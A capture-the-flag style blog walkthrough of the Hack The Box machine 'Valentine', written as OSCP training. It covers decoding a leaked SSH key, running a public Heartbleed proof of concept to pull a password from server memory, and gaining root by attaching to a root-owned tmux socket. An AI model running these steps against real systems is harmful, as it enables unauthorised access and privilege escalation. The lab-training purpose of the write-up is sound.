- April

2020

Posted by: Ángel Guzmán

[Cybersecurity & hacking tools and techniques]

Road to OSCP - Hack The Box Write Up - Valentine

Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we will show how junior evaluators complete some Hack The Box machines in their road to OSCP, a well-known, respected, and required for many top cybersecurity positions certification. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems due to poor configurations.

Let's start with the fun!

Valentine

Initial Foothold

Enumerating port 80 we find hype_key, which looks like it is encoded in hex.

Opening the file with vim we do: :%s/ //g to remove the white spaces. And, with xxd -r -p hype_key > hype_key.key, we obtain what looks like a private key. Unfortunately, it is protected by a password that is not in rockyou.txt.

User

Looking at the version of OpenSSH (and the name of the machine) we can try to exploit heartbleed. Got the exploit from this repository: https://github.com/mpgn/heartbleed-PoC. Run it: python heartbleed-exploit.py 10.10.10.79.

After running it a few times, we get something interesting.

  00e0: 31 2F 64 65 63 6F 64 65 2E 70 68 70 0D 0A 43 6F  1/decode.php..Co
  00f0: 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C  ntent-Type: appl
  0100: 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F  ication/x-www-fo
  0110: 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A 43  rm-urlencoded..C
  0120: 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34  ontent-Length: 4
  0130: 32 0D 0A 0D 0A 24 74 65 78 74 3D 61 47 56 68 63  2....$text=aGVhc
  0140: 6E 52 69 62 47 56 6C 5A 47 4A 6C 62 47 6C 6C 64  nRibGVlZGJlbGlld
  0150: 6D 56 30 61 47 56 6F 65 58 42 6C 43 67 3D 3D E6  mV0aGVoeXBlCg==.
  0160: 21 D9 4E 30 C2 28 F7 11 36 01 B3 6E 5D 70 C6 A1  !.N0.(..6..n]p..

That base64 translates to: heartbleedbelievethehype, which happens to be the password for the ssh private key. Now, after setting chmod 600 hype_key.key, we can ssh into the box: ssh -i hype_key.key hype@10.10.10.79.

Root

Running lse.sh we see that we have write access to a peculiar file: /.devs/dev_sess, which is owned by root. Doing file /.devs/dev_sess reveals that it is a socket file.

To find out who is using this socket file, we can do ps aux | grep dev_sess. root 1022 0.0 0.1 26416 1672 ? Ss 07:18 0:01 /usr/bin/tmux -S /.devs/dev_sess

Turns out, it is a tmux session running as root. Can we attach to it? tmux -S /.devs/dev_sess

We get an error: open terminal failed: missing or unsuitable terminal: tmux-256color. Google the error and we find the solution: export TERM=xterm.

We can now attach to the tmux session that is running as root.